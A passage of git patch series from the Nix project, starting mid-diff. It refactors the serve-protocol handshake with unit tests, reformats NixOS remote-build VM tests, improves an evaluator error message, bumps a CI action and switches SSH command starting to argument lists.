+ conn->sshConn->in.close(); + { + NullSink nullSink; + conn->from.drainInto(nullSink); + } + throw Error("'nix-store --serve' protocol mismatch from '%s', got '%s'", + host, chomp(saved.s)); } catch (EndOfFile & e) { throw Error("cannot connect to '%1%'", host); } From 4a5ca576da511fcc64039c2494f41f710d662478 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sun, 20 Feb 2022 19:24:07 +0000 Subject: [PATCH 328/654] Factor out `ServeProto::BasicClientConnection::handshake` Hydra to share --- src/libstore/legacy-ssh-store.cc | 11 ++--------- src/libstore/serve-protocol-impl.cc | 19 +++++++++++++++++++ src/libstore/serve-protocol-impl.hh | 22 ++++++++++++++++++++++ 3 files changed, 43 insertions(+), 9 deletions(-) diff --git a/src/libstore/legacy-ssh-store.cc b/src/libstore/legacy-ssh-store.cc index 058b1affd..4f020c452 100644 --- a/src/libstore/legacy-ssh-store.cc +++ b/src/libstore/legacy-ssh-store.cc @@ -64,15 +64,8 @@ ref LegacySSHStore::openConnection() StringSink saved; TeeSource tee(conn->from, saved); try { - conn->to << SERVE_MAGIC_1 << SERVE_PROTOCOL_VERSION; - conn->to.flush(); - - unsigned int magic = readInt(conn->from); - if (magic != SERVE_MAGIC_2) - throw Error("'nix-store --serve' protocol mismatch from '%s'", host); - conn->remoteVersion = readInt(conn->from); - if (GET_PROTOCOL_MAJOR(conn->remoteVersion) != 0x200) - throw Error("unsupported 'nix-store --serve' protocol version on '%s'", host); + conn->remoteVersion = ServeProto::BasicClientConnection::handshake( + conn->to, tee, SERVE_PROTOCOL_VERSION, host); } catch (SerialisationError & e) { // in.close(): Don't let the remote block on us not writing. 
conn->sshConn->in.close(); diff --git a/src/libstore/serve-protocol-impl.cc b/src/libstore/serve-protocol-impl.cc index e65de7650..6bf6c8cf6 100644 --- a/src/libstore/serve-protocol-impl.cc +++ b/src/libstore/serve-protocol-impl.cc @@ -4,6 +4,25 @@ namespace nix { +ServeProto::Version ServeProto::BasicClientConnection::handshake( + BufferedSink & to, + Source & from, + ServeProto::Version localVersion, + std::string_view host) +{ + to << SERVE_MAGIC_1 << localVersion; + to.flush(); + + unsigned int magic = readInt(from); + if (magic != SERVE_MAGIC_2) + throw Error("'nix-store --serve' protocol mismatch from '%s'", host); + auto remoteVersion = readInt(from); + if (GET_PROTOCOL_MAJOR(remoteVersion) != 0x200) + throw Error("unsupported 'nix-store --serve' protocol version on '%s'", host); + return remoteVersion; +} + + StorePathSet ServeProto::BasicClientConnection::queryValidPaths( const Store & store, bool lock, const StorePathSet & paths, diff --git a/src/libstore/serve-protocol-impl.hh b/src/libstore/serve-protocol-impl.hh index 312f5d47a..8cd241fd3 100644 --- a/src/libstore/serve-protocol-impl.hh +++ b/src/libstore/serve-protocol-impl.hh @@ -63,6 +63,28 @@ struct ServeProto::BasicClientConnection FdSource from; ServeProto::Version remoteVersion; + /** + * Establishes connection, negotiating version. + * + * @return the version provided by the other side of the + * connection. + * + * @param to Taken by reference to allow for various error handling + * mechanisms. + * + * @param from Taken by reference to allow for various error + * handling mechanisms. + * + * @param localVersion Our version which is sent over + * + * @param host Just used to add context to thrown exceptions. + */ + static ServeProto::Version handshake( + BufferedSink & to, + Source & from, + ServeProto::Version localVersion, + std::string_view host); + /** * Coercion to `ServeProto::ReadConn`. 
This makes it easy to use the * factored out serve protocol serializers with a From e960b2823091f7c6685b55d5f1ad8d7612130009 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Fri, 19 Jan 2024 16:38:08 -0500 Subject: [PATCH 329/654] Factor out `ServeProto::BasicServerConnection::handshake` We'll need this for unit testing. Co-authored-by: Robert Hensing --- src/libstore/serve-protocol-impl.cc | 12 ++++++++++++ src/libstore/serve-protocol-impl.hh | 22 ++++++++++++++++++++++ src/libstore/serve-protocol.hh | 1 + src/nix-store/nix-store.cc | 8 +++----- 4 files changed, 38 insertions(+), 5 deletions(-) diff --git a/src/libstore/serve-protocol-impl.cc b/src/libstore/serve-protocol-impl.cc index 6bf6c8cf6..b39212884 100644 --- a/src/libstore/serve-protocol-impl.cc +++ b/src/libstore/serve-protocol-impl.cc @@ -22,6 +22,18 @@ ServeProto::Version ServeProto::BasicClientConnection::handshake( return remoteVersion; } +ServeProto::Version ServeProto::BasicServerConnection::handshake( + BufferedSink & to, + Source & from, + ServeProto::Version localVersion) +{ + unsigned int magic = readInt(from); + if (magic != SERVE_MAGIC_1) throw Error("protocol mismatch"); + to << SERVE_MAGIC_2 << localVersion; + to.flush(); + return readInt(from); +} + StorePathSet ServeProto::BasicClientConnection::queryValidPaths( const Store & store, diff --git a/src/libstore/serve-protocol-impl.hh b/src/libstore/serve-protocol-impl.hh index 8cd241fd3..fd8d94697 100644 --- a/src/libstore/serve-protocol-impl.hh +++ b/src/libstore/serve-protocol-impl.hh @@ -132,4 +132,26 @@ struct ServeProto::BasicClientConnection const ServeProto::BuildOptions & options); }; +struct ServeProto::BasicServerConnection +{ + /** + * Establishes connection, negotiating version. + * + * @return the version provided by the other side of the + * connection. + * + * @param to Taken by reference to allow for various error handling + * mechanisms.
+ * + * @param from Taken by reference to allow for various error + * handling mechanisms. + * + * @param localVersion Our version which is sent over + */ + static ServeProto::Version handshake( + BufferedSink & to, + Source & from, + ServeProto::Version localVersion); +}; + } diff --git a/src/libstore/serve-protocol.hh b/src/libstore/serve-protocol.hh index 632c4b6bd..8c112bb74 100644 --- a/src/libstore/serve-protocol.hh +++ b/src/libstore/serve-protocol.hh @@ -65,6 +65,7 @@ struct ServeProto * @todo remove once Hydra uses Store abstraction consistently. */ struct BasicClientConnection; + struct BasicServerConnection; /** * Data type for canonical pairs of serialisers for the serve protocol. diff --git a/src/nix-store/nix-store.cc b/src/nix-store/nix-store.cc index 0a0a3ab1a..40378e123 100644 --- a/src/nix-store/nix-store.cc +++ b/src/nix-store/nix-store.cc @@ -828,11 +828,9 @@ static void opServe(Strings opFlags, Strings opArgs) FdSink out(STDOUT_FILENO); /* Exchange the greeting. */ - unsigned int magic = readInt(in); - if (magic != SERVE_MAGIC_1) throw Error("protocol mismatch"); - out << SERVE_MAGIC_2 << SERVE_PROTOCOL_VERSION; - out.flush(); - ServeProto::Version clientVersion = readInt(in); + ServeProto::Version clientVersion = + ServeProto::BasicServerConnection::handshake( + out, in, SERVE_PROTOCOL_VERSION); ServeProto::ReadConn rconn { .from = in, From 1fb25829692e5455c0edec96226af295957d99b4 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Fri, 19 Jan 2024 18:42:27 -0500 Subject: [PATCH 330/654] Create unit tests for the serve proto handshake Co-authored-by: Robert Hensing --- .../serve-protocol/handshake-to-client.bin | Bin 0 -> 16 bytes tests/unit/libstore/serve-protocol.cc | 110 ++++++++++++++++++ 2 files changed, 110 insertions(+) create mode 100644 tests/unit/libstore/data/serve-protocol/handshake-to-client.bin diff --git a/tests/unit/libstore/data/serve-protocol/handshake-to-client.bin 
b/tests/unit/libstore/data/serve-protocol/handshake-to-client.bin new file mode 100644 index 0000000000000000000000000000000000000000..15ba4b5e3d96e388637107542f6eb9f7e94ac708 GIT binary patch literal 16 RcmX^8E+~Wn1em}i0{|m{0%8CF literal 0 HcmV?d00001 diff --git a/tests/unit/libstore/serve-protocol.cc b/tests/unit/libstore/serve-protocol.cc index 8f256d1e6..597c0b570 100644 --- a/tests/unit/libstore/serve-protocol.cc +++ b/tests/unit/libstore/serve-protocol.cc @@ -1,3 +1,4 @@ +#include #include #include @@ -6,6 +7,7 @@ #include "serve-protocol.hh" #include "serve-protocol-impl.hh" #include "build-result.hh" +#include "file-descriptor.hh" #include "tests/protocol.hh" #include "tests/characterization.hh" @@ -401,4 +403,112 @@ VERSIONED_CHARACTERIZATION_TEST( }, })) +TEST_F(ServeProtoTest, handshake_log) +{ + CharacterizationTest::writeTest("handshake-to-client", [&]() -> std::string { + StringSink toClientLog; + + Pipe toClient, toServer; + toClient.create(); + toServer.create(); + + ServeProto::Version clientResult, serverResult; + + auto thread = std::thread([&]() { + FdSink out { toServer.writeSide.get() }; + FdSource in0 { toClient.readSide.get() }; + TeeSource in { in0, toClientLog }; + clientResult = ServeProto::BasicClientConnection::handshake( + out, in, defaultVersion, "blah"); + }); + + { + FdSink out { toClient.writeSide.get() }; + FdSource in { toServer.readSide.get() }; + serverResult = ServeProto::BasicServerConnection::handshake( + out, in, defaultVersion); + }; + + thread.join(); + + return std::move(toClientLog.s); + }); +} + +/// Has to be a `BufferedSink` for handshake. 
+struct NullBufferedSink : BufferedSink { + void writeUnbuffered(std::string_view data) override { } +}; + +TEST_F(ServeProtoTest, handshake_client_replay) +{ + CharacterizationTest::readTest("handshake-to-client", [&](std::string toClientLog) { + NullBufferedSink nullSink; + + StringSource in { toClientLog }; + auto clientResult = ServeProto::BasicClientConnection::handshake( + nullSink, in, defaultVersion, "blah"); + + EXPECT_EQ(clientResult, defaultVersion); + }); +} + +TEST_F(ServeProtoTest, handshake_client_truncated_replay_throws) +{ + CharacterizationTest::readTest("handshake-to-client", [&](std::string toClientLog) { + for (size_t len = 0; len < toClientLog.size(); ++len) { + NullBufferedSink nullSink; + StringSource in { + // truncate + toClientLog.substr(0, len) + }; + if (len < 8) { + EXPECT_THROW( + ServeProto::BasicClientConnection::handshake( + nullSink, in, defaultVersion, "blah"), + EndOfFile); + } else { + // Not sure why cannot keep on checking for `EndOfFile`. + EXPECT_THROW( + ServeProto::BasicClientConnection::handshake( + nullSink, in, defaultVersion, "blah"), + Error); + } + } + }); +} + +TEST_F(ServeProtoTest, handshake_client_corrupted_throws) +{ + CharacterizationTest::readTest("handshake-to-client", [&](const std::string toClientLog) { + for (size_t idx = 0; idx < toClientLog.size(); ++idx) { + // corrupt a copy + std::string toClientLogCorrupt = toClientLog; + toClientLogCorrupt[idx] *= 4; + ++toClientLogCorrupt[idx]; + + NullBufferedSink nullSink; + StringSource in { toClientLogCorrupt }; + + if (idx < 4 || idx == 9) { + // magic bytes don't match + EXPECT_THROW( + ServeProto::BasicClientConnection::handshake( + nullSink, in, defaultVersion, "blah"), + Error); + } else if (idx < 8 || idx >= 12) { + // Number out of bounds + EXPECT_THROW( + ServeProto::BasicClientConnection::handshake( + nullSink, in, defaultVersion, "blah"), + SerialisationError); + } else { + auto ver = ServeProto::BasicClientConnection::handshake( + nullSink, in, 
defaultVersion, "blah"); + EXPECT_NE(ver, defaultVersion); + } + } + }); +} + } From 5167351efbee5c5a7390510eb720c31c6976f4d9 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Mon, 22 Jan 2024 18:44:16 +0100 Subject: [PATCH 331/654] tests/nixos/remote-builds*: Inline module + format --- tests/nixos/remote-builds-ssh-ng.nix | 149 +++++++++++++------------- tests/nixos/remote-builds.nix | 151 +++++++++++++-------------- 2 files changed, 149 insertions(+), 151 deletions(-) diff --git a/tests/nixos/remote-builds-ssh-ng.nix b/tests/nixos/remote-builds-ssh-ng.nix index b9174a788..cca4066f3 100644 --- a/tests/nixos/remote-builds-ssh-ng.nix +++ b/tests/nixos/remote-builds-ssh-ng.nix @@ -28,96 +28,95 @@ let in { - name = lib.mkDefault "remote-builds-ssh-ng"; - - # TODO expand module shorthand syntax instead of use imports - imports = [{ - options = { - builders.config = lib.mkOption { - type = lib.types.deferredModule; - description = '' - Configuration to add to the builder nodes. - ''; - default = { }; - }; + options = { + builders.config = lib.mkOption { + type = lib.types.deferredModule; + description = '' + Configuration to add to the builder nodes. + ''; + default = { }; }; - }]; + }; - nodes = - { builder = - { config, pkgs, ... }: - { - imports = [ test.config.builders.config ]; - services.openssh.enable = true; - virtualisation.writableStore = true; - nix.settings.sandbox = true; - nix.settings.substituters = lib.mkForce [ ]; - }; + config = { + name = lib.mkDefault "remote-builds-ssh-ng"; - client = - { config, lib, pkgs, ... }: - { nix.settings.max-jobs = 0; # force remote building - nix.distributedBuilds = true; - nix.buildMachines = - [ { hostName = "builder"; - sshUser = "root"; - sshKey = "/root/.ssh/id_ed25519"; - system = "i686-linux"; - maxJobs = 1; - protocol = "ssh-ng"; - } - ]; + nodes = + { builder = + { config, pkgs, ... 
}: + { + imports = [ test.config.builders.config ]; + services.openssh.enable = true; virtualisation.writableStore = true; - virtualisation.additionalPaths = [ config.system.build.extraUtils ]; + nix.settings.sandbox = true; nix.settings.substituters = lib.mkForce [ ]; - programs.ssh.extraConfig = "ConnectTimeout 30"; }; - }; - testScript = { nodes }: '' - # fmt: off - import subprocess + client = + { config, lib, pkgs, ... }: + { nix.settings.max-jobs = 0; # force remote building + nix.distributedBuilds = true; + nix.buildMachines = + [ { hostName = "builder"; + sshUser = "root"; + sshKey = "/root/.ssh/id_ed25519"; + system = "i686-linux"; + maxJobs = 1; + protocol = "ssh-ng"; + } + ]; + virtualisation.writableStore = true; + virtualisation.additionalPaths = [ config.system.build.extraUtils ]; + nix.settings.substituters = lib.mkForce [ ]; + programs.ssh.extraConfig = "ConnectTimeout 30"; + }; + }; - start_all() + testScript = { nodes }: '' + # fmt: off + import subprocess - # Create an SSH key on the client. - subprocess.run([ - "${hostPkgs.openssh}/bin/ssh-keygen", "-t", "ed25519", "-f", "key", "-N", "" - ], capture_output=True, check=True) - client.succeed("mkdir -p -m 700 /root/.ssh") - client.copy_from_host("key", "/root/.ssh/id_ed25519") - client.succeed("chmod 600 /root/.ssh/id_ed25519") + start_all() - # Install the SSH key on the builder. - client.wait_for_unit("network.target") - builder.succeed("mkdir -p -m 700 /root/.ssh") - builder.copy_from_host("key.pub", "/root/.ssh/authorized_keys") - builder.wait_for_unit("sshd") - client.succeed(f"ssh -o StrictHostKeyChecking=no {builder.name} 'echo hello world'") + # Create an SSH key on the client. 
+ subprocess.run([ + "${hostPkgs.openssh}/bin/ssh-keygen", "-t", "ed25519", "-f", "key", "-N", "" + ], capture_output=True, check=True) + client.succeed("mkdir -p -m 700 /root/.ssh") + client.copy_from_host("key", "/root/.ssh/id_ed25519") + client.succeed("chmod 600 /root/.ssh/id_ed25519") - # Perform a build - out = client.succeed("nix-build ${expr nodes.client 1} 2> build-output") + # Install the SSH key on the builder. + client.wait_for_unit("network.target") + builder.succeed("mkdir -p -m 700 /root/.ssh") + builder.copy_from_host("key.pub", "/root/.ssh/authorized_keys") + builder.wait_for_unit("sshd") + client.succeed(f"ssh -o StrictHostKeyChecking=no {builder.name} 'echo hello world'") - # Verify that the build was done on the builder - builder.succeed(f"test -e {out.strip()}") + # Perform a build + out = client.succeed("nix-build ${expr nodes.client 1} 2> build-output") - # Print the build log, prefix the log lines to avoid nix intercepting lines starting with @nix - buildOutput = client.succeed("sed -e 's/^/build-output:/' build-output") - print(buildOutput) + # Verify that the build was done on the builder + builder.succeed(f"test -e {out.strip()}") - # Make sure that we get the expected build output - client.succeed("grep -qF Hello build-output") + # Print the build log, prefix the log lines to avoid nix intercepting lines starting with @nix + buildOutput = client.succeed("sed -e 's/^/build-output:/' build-output") + print(buildOutput) - # We don't want phase reporting in the build output - client.fail("grep -qF '@nix' build-output") + # Make sure that we get the expected build output + client.succeed("grep -qF Hello build-output") - # Get the log file - client.succeed(f"nix-store --read-log {out.strip()} > log-output") - # Prefix the log lines to avoid nix intercepting lines starting with @nix - logOutput = client.succeed("sed -e 's/^/log-file:/' log-output") - print(logOutput) + # We don't want phase reporting in the build output + client.fail("grep -qF 
'@nix' build-output") - # Check that we get phase reporting in the log file - client.succeed("grep -q '@nix {\"action\":\"setPhase\",\"phase\":\"buildPhase\"}' log-output") - ''; + # Get the log file + client.succeed(f"nix-store --read-log {out.strip()} > log-output") + # Prefix the log lines to avoid nix intercepting lines starting with @nix + logOutput = client.succeed("sed -e 's/^/log-file:/' log-output") + print(logOutput) + + # Check that we get phase reporting in the log file + client.succeed("grep -q '@nix {\"action\":\"setPhase\",\"phase\":\"buildPhase\"}' log-output") + ''; + }; } diff --git a/tests/nixos/remote-builds.nix b/tests/nixos/remote-builds.nix index 6f9b0ebf0..423b9d171 100644 --- a/tests/nixos/remote-builds.nix +++ b/tests/nixos/remote-builds.nix @@ -37,90 +37,89 @@ let in { - name = lib.mkDefault "remote-builds"; + options = { + builders.config = lib.mkOption { + type = lib.types.deferredModule; + description = '' + Configuration to add to the builder nodes. + ''; + default = { }; + }; + }; - # TODO expand module shorthand syntax instead of use imports - imports = [{ - options = { - builders.config = lib.mkOption { - type = lib.types.deferredModule; - description = '' - Configuration to add to the builder nodes. - ''; - default = { }; + config = { + name = lib.mkDefault "remote-builds"; + + nodes = + { builder1 = builder; + builder2 = builder; + + client = + { config, lib, pkgs, ... 
}: + { nix.settings.max-jobs = 0; # force remote building + nix.distributedBuilds = true; + nix.buildMachines = + [ { hostName = "builder1"; + sshUser = "root"; + sshKey = "/root/.ssh/id_ed25519"; + system = "i686-linux"; + maxJobs = 1; + } + { hostName = "builder2"; + sshUser = "root"; + sshKey = "/root/.ssh/id_ed25519"; + system = "i686-linux"; + maxJobs = 1; + } + ]; + virtualisation.writableStore = true; + virtualisation.additionalPaths = [ config.system.build.extraUtils ]; + nix.settings.substituters = lib.mkForce [ ]; + programs.ssh.extraConfig = "ConnectTimeout 30"; + }; }; - }; - }]; - nodes = - { builder1 = builder; - builder2 = builder; + testScript = { nodes }: '' + # fmt: off + import subprocess - client = - { config, lib, pkgs, ... }: - { nix.settings.max-jobs = 0; # force remote building - nix.distributedBuilds = true; - nix.buildMachines = - [ { hostName = "builder1"; - sshUser = "root"; - sshKey = "/root/.ssh/id_ed25519"; - system = "i686-linux"; - maxJobs = 1; - } - { hostName = "builder2"; - sshUser = "root"; - sshKey = "/root/.ssh/id_ed25519"; - system = "i686-linux"; - maxJobs = 1; - } - ]; - virtualisation.writableStore = true; - virtualisation.additionalPaths = [ config.system.build.extraUtils ]; - nix.settings.substituters = lib.mkForce [ ]; - programs.ssh.extraConfig = "ConnectTimeout 30"; - }; - }; + start_all() - testScript = { nodes }: '' - # fmt: off - import subprocess + # Create an SSH key on the client. + subprocess.run([ + "${hostPkgs.openssh}/bin/ssh-keygen", "-t", "ed25519", "-f", "key", "-N", "" + ], capture_output=True, check=True) + client.succeed("mkdir -p -m 700 /root/.ssh") + client.copy_from_host("key", "/root/.ssh/id_ed25519") + client.succeed("chmod 600 /root/.ssh/id_ed25519") - start_all() + # Install the SSH key on the builders. 
+ client.wait_for_unit("network.target") + for builder in [builder1, builder2]: + builder.succeed("mkdir -p -m 700 /root/.ssh") + builder.copy_from_host("key.pub", "/root/.ssh/authorized_keys") + builder.wait_for_unit("sshd") + client.succeed(f"ssh -o StrictHostKeyChecking=no {builder.name} 'echo hello world'") - # Create an SSH key on the client. - subprocess.run([ - "${hostPkgs.openssh}/bin/ssh-keygen", "-t", "ed25519", "-f", "key", "-N", "" - ], capture_output=True, check=True) - client.succeed("mkdir -p -m 700 /root/.ssh") - client.copy_from_host("key", "/root/.ssh/id_ed25519") - client.succeed("chmod 600 /root/.ssh/id_ed25519") + # Perform a build and check that it was performed on the builder. + out = client.succeed( + "nix-build ${expr nodes.client 1} 2> build-output", + "grep -q Hello build-output" + ) + builder1.succeed(f"test -e {out}") - # Install the SSH key on the builders. - client.wait_for_unit("network.target") - for builder in [builder1, builder2]: - builder.succeed("mkdir -p -m 700 /root/.ssh") - builder.copy_from_host("key.pub", "/root/.ssh/authorized_keys") - builder.wait_for_unit("sshd") - client.succeed(f"ssh -o StrictHostKeyChecking=no {builder.name} 'echo hello world'") + # And a parallel build. + paths = client.succeed(r'nix-store -r $(nix-instantiate ${expr nodes.client 2})\!out $(nix-instantiate ${expr nodes.client 3})\!out') + out1, out2 = paths.split() + builder1.succeed(f"test -e {out1} -o -e {out2}") + builder2.succeed(f"test -e {out1} -o -e {out2}") - # Perform a build and check that it was performed on the builder. - out = client.succeed( - "nix-build ${expr nodes.client 1} 2> build-output", - "grep -q Hello build-output" - ) - builder1.succeed(f"test -e {out}") + # And a failing build. + client.fail("nix-build ${expr nodes.client 5}") - # And a parallel build. 
- paths = client.succeed(r'nix-store -r $(nix-instantiate ${expr nodes.client 2})\!out $(nix-instantiate ${expr nodes.client 3})\!out') - out1, out2 = paths.split() - builder1.succeed(f"test -e {out1} -o -e {out2}") - builder2.succeed(f"test -e {out1} -o -e {out2}") - - # And a failing build. - client.fail("nix-build ${expr nodes.client 5}") - - # Test whether the build hook automatically skips unavailable builders. - builder1.block() - client.succeed("nix-build ${expr nodes.client 4}") - ''; + # Test whether the build hook automatically skips unavailable builders. + builder1.block() + client.succeed("nix-build ${expr nodes.client 4}") + ''; + }; } From c4d7c4a8485cb74f57045d1fa14c1d5f9fa28310 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Mon, 22 Jan 2024 18:47:59 +0100 Subject: [PATCH 332/654] nixos/tests/remote-builds*: Format nixpkgs-fmt --- tests/nixos/remote-builds-ssh-ng.nix | 38 +++++++++++++++------------- tests/nixos/remote-builds.nix | 13 +++++++--- 2 files changed, 29 insertions(+), 22 deletions(-) diff --git a/tests/nixos/remote-builds-ssh-ng.nix b/tests/nixos/remote-builds-ssh-ng.nix index cca4066f3..926ec00fe 100644 --- a/tests/nixos/remote-builds-ssh-ng.nix +++ b/tests/nixos/remote-builds-ssh-ng.nix @@ -42,29 +42,31 @@ in name = lib.mkDefault "remote-builds-ssh-ng"; nodes = - { builder = - { config, pkgs, ... }: - { - imports = [ test.config.builders.config ]; - services.openssh.enable = true; - virtualisation.writableStore = true; - nix.settings.sandbox = true; - nix.settings.substituters = lib.mkForce [ ]; - }; + { + builder = + { config, pkgs, ... }: + { + imports = [ test.config.builders.config ]; + services.openssh.enable = true; + virtualisation.writableStore = true; + nix.settings.sandbox = true; + nix.settings.substituters = lib.mkForce [ ]; + }; client = { config, lib, pkgs, ... 
}: - { nix.settings.max-jobs = 0; # force remote building + { + nix.settings.max-jobs = 0; # force remote building nix.distributedBuilds = true; nix.buildMachines = - [ { hostName = "builder"; - sshUser = "root"; - sshKey = "/root/.ssh/id_ed25519"; - system = "i686-linux"; - maxJobs = 1; - protocol = "ssh-ng"; - } - ]; + [{ + hostName = "builder"; + sshUser = "root"; + sshKey = "/root/.ssh/id_ed25519"; + system = "i686-linux"; + maxJobs = 1; + protocol = "ssh-ng"; + }]; virtualisation.writableStore = true; virtualisation.additionalPaths = [ config.system.build.extraUtils ]; nix.settings.substituters = lib.mkForce [ ]; diff --git a/tests/nixos/remote-builds.nix b/tests/nixos/remote-builds.nix index 423b9d171..1661203ec 100644 --- a/tests/nixos/remote-builds.nix +++ b/tests/nixos/remote-builds.nix @@ -51,21 +51,26 @@ in name = lib.mkDefault "remote-builds"; nodes = - { builder1 = builder; + { + builder1 = builder; builder2 = builder; client = { config, lib, pkgs, ... }: - { nix.settings.max-jobs = 0; # force remote building + { + nix.settings.max-jobs = 0; # force remote building nix.distributedBuilds = true; nix.buildMachines = - [ { hostName = "builder1"; + [ + { + hostName = "builder1"; sshUser = "root"; sshKey = "/root/.ssh/id_ed25519"; system = "i686-linux"; maxJobs = 1; } - { hostName = "builder2"; + { + hostName = "builder2"; sshUser = "root"; sshKey = "/root/.ssh/id_ed25519"; system = "i686-linux"; From 81499a0b93a136f889f3799d7110dcc479a4cbe1 Mon Sep 17 00:00:00 2001 From: Maximilian Bosch Date: Sat, 20 Jan 2024 16:05:30 +0100 Subject: [PATCH 333/654] libexpr: print value of what is attempted to be called as function MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Low-hanging fruit in the spirit of #9753 and #9754 (means 9999years did all the hard work already). This basically prints out what was attempted to be called as function, i.e. 
map (import {}) [ 1 2 3 ] now gives the following error message: error: … while calling the 'map' builtin at «string»:1:1: 1| map (import {}) [ 1 2 3 ] | ^ … while evaluating the first argument passed to builtins.map error: expected a function but found a set: { _type = "pkgs"; AAAAAASomeThingsFailToEvaluate = «thunk»; AMB-plugins = «thunk»; ArchiSteamFarm = «thunk»; BeatSaberModManager = «thunk»; CHOWTapeModel = «thunk»; ChowCentaur = «thunk»; ChowKick = «thunk»; ChowPhaser = «thunk»; CoinMP = «thunk»; «18783 attributes elided»} --- src/libexpr/eval.cc | 6 +++++- tests/unit/libexpr/error_traces.cc | 4 ++-- 2 files changed, 7 insertions(+), 3 deletions(-) diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 71e956e10..ce410162e 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -1692,7 +1692,11 @@ void EvalState::callFunction(Value & fun, size_t nrArgs, Value * * args, Value & } else - error("attempt to call something which is not a function but %1%", showType(vCur)).atPos(pos).debugThrow(); + error("attempt to call something which is not a function but %1%: %2%", + showType(vCur), + ValuePrinter(*this, vCur, errorPrintOptions)) + .atPos(pos) + .debugThrow(); } vRes = vCur; diff --git a/tests/unit/libexpr/error_traces.cc b/tests/unit/libexpr/error_traces.cc index f0cad58bb..f99aafd74 100644 --- a/tests/unit/libexpr/error_traces.cc +++ b/tests/unit/libexpr/error_traces.cc @@ -750,7 +750,7 @@ namespace nix { ASSERT_TRACE1("foldl' (_: 1) \"foo\" [ true ]", TypeError, - hintfmt("attempt to call something which is not a function but %s", "an integer")); + hintfmt("attempt to call something which is not a function but %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL)); ASSERT_TRACE2("foldl' (a: b: a && b) \"foo\" [ true ]", TypeError, @@ -835,7 +835,7 @@ namespace nix { ASSERT_TRACE1("sort (_: 1) [ \"foo\" \"bar\" ]", TypeError, - hintfmt("attempt to call something which is not a function but %s", "an integer")); + hintfmt("attempt to call something 
which is not a function but %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL)); ASSERT_TRACE2("sort (_: _: 1) [ \"foo\" \"bar\" ]", TypeError, From 9a51209309891f8bf7edf65673682df13d4beb90 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 22 Jan 2024 22:40:01 +0000 Subject: [PATCH 334/654] build(deps): bump zeebe-io/backport-action from 2.3.0 to 2.4.0 Bumps [zeebe-io/backport-action](https://github.com/zeebe-io/backport-action) from 2.3.0 to 2.4.0. - [Release notes](https://github.com/zeebe-io/backport-action/releases) - [Commits](https://github.com/zeebe-io/backport-action/compare/v2.3.0...v2.4.0) --- updated-dependencies: - dependency-name: zeebe-io/backport-action dependency-type: direct:production update-type: version-update:semver-minor ... Signed-off-by: dependabot[bot] --- .github/workflows/backport.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/backport.yml b/.github/workflows/backport.yml index f003114ba..46a4529c1 100644 --- a/.github/workflows/backport.yml +++ b/.github/workflows/backport.yml @@ -21,7 +21,7 @@ jobs: fetch-depth: 0 - name: Create backport PRs # should be kept in sync with `version` - uses: zeebe-io/backport-action@v2.3.0 + uses: zeebe-io/backport-action@v2.4.0 with: # Config README: https://github.com/zeebe-io/backport-action#backport-action github_token: ${{ secrets.GITHUB_TOKEN }} From b71673109c2172cb1f933cc8a97c26b4352ac239 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Mon, 22 Jan 2024 15:50:00 -0500 Subject: [PATCH 335/654] Make `SSHMaster::startCommand` work on an args list This avoids split-on-whitespace errors: - No more `bash -c` needed - No more `shellEscape` needed - `remote-program` ssh store setting also cleanly supports args (e.g. `nix daemon`) - `ssh` uses `--` to separate args for SSH from args for the command to run. and will help with Hydra dedup. Some code taken from #6628. 
Co-Authored-By: Alexander Bantyev --- src/libstore/legacy-ssh-store.cc | 11 ++++++++--- src/libstore/legacy-ssh-store.hh | 2 +- src/libstore/ssh-store.cc | 19 ++++++++++--------- src/libstore/ssh.cc | 12 +++++++----- src/libstore/ssh.hh | 11 ++++++++++- 5 files changed, 36 insertions(+), 19 deletions(-) diff --git a/src/libstore/legacy-ssh-store.cc b/src/libstore/legacy-ssh-store.cc index 4f020c452..e422adeec 100644 --- a/src/libstore/legacy-ssh-store.cc +++ b/src/libstore/legacy-ssh-store.cc @@ -55,9 +55,14 @@ LegacySSHStore::LegacySSHStore(const std::string & scheme, const std::string & h ref LegacySSHStore::openConnection() { auto conn = make_ref(); - conn->sshConn = master.startCommand( - fmt("%s --serve --write", remoteProgram) - + (remoteStore.get() == "" ? "" : " --store " + shellEscape(remoteStore.get()))); + Strings command = remoteProgram.get(); + command.push_back("--serve"); + command.push_back("--write"); + if (remoteStore.get() != "") { + command.push_back("--store"); + command.push_back(remoteStore.get()); + } + conn->sshConn = master.startCommand(std::move(command)); conn->to = FdSink(conn->sshConn->in.get()); conn->from = FdSource(conn->sshConn->out.get()); diff --git a/src/libstore/legacy-ssh-store.hh b/src/libstore/legacy-ssh-store.hh index bdf79eab3..ae890177b 100644 --- a/src/libstore/legacy-ssh-store.hh +++ b/src/libstore/legacy-ssh-store.hh @@ -13,7 +13,7 @@ struct LegacySSHStoreConfig : virtual CommonSSHStoreConfig { using CommonSSHStoreConfig::CommonSSHStoreConfig; - const Setting remoteProgram{this, "nix-store", "remote-program", + const Setting remoteProgram{this, {"nix-store"}, "remote-program", "Path to the `nix-store` executable on the remote machine."}; const Setting maxConnections{this, 1, "max-connections", diff --git a/src/libstore/ssh-store.cc b/src/libstore/ssh-store.cc index d4c8ab5b2..0cf92b114 100644 --- a/src/libstore/ssh-store.cc +++ b/src/libstore/ssh-store.cc @@ -17,7 +17,7 @@ struct SSHStoreConfig : virtual 
